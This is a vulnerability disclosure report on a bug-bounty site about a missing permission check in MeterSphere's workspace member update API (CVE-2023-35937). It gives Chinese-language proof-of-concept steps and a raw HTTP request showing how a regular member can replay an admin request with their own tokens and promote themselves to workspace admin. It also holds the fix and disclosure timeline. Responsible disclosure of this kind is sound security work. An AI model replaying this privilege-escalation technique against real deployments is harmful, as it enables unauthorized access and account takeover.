missing permission check for API /setting/workspace/member/update in metersphere/metersphere


Reported on

May 30th 2023

Proof of Concept

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息,比如将其更新为空间管理员

4 使用burpsuite拦截请求

POST /setting/workspace/member/update HTTP/1.1
Content-Length: 144
Accept-Language: zh-CN
WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
Connection: close


5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的,即以user2的身份执行请求

6 发现执行结果成功,即普通用户可以执行管理员才能执行的update


普通用户可以执行空间管理员才能执行的update ,比如可以将普通用户更新成空间管理员。


We are processing your report and will contact the metersphere team within 24 hours. 4 months ago
lujiefsi modified the report
4 months ago
lujiefsi modified the report
4 months ago
lujiefsi submitted a
4 months ago
lujiefsi submitted a
4 months ago
We have contacted a member of the metersphere team and are waiting to hear back 4 months ago
4 months ago


感谢您的安全建议,可以在 https://github.com/metersphere/metersphere/security 这提交,谢谢。

3 months ago


@admin this issuse has been fixed via https://github.com/metersphere/metersphere/commit/177332419843dc0cfbf2a3878229b426bd767445 , and it also has been assigned CVE-2023-35937..

could you please mark it as vaild and assign CVE-2023-35937 on this report?

Ben Harvie
2 months ago


CVE attached as requested:)

2 months ago


@admin @Maintainer can we mark it as vaild and publish it? As github has puslish it via https://github.com/metersphere/metersphere/security/advisories/GHSA-7xj3-qrx5-524r

Ben Harvie validated this vulnerability 2 months ago
lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie marked this as fixed in 177332419843dc0cfbf2a3878229b426bd767445 with commit 177332 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 2 months ago
to join this conversation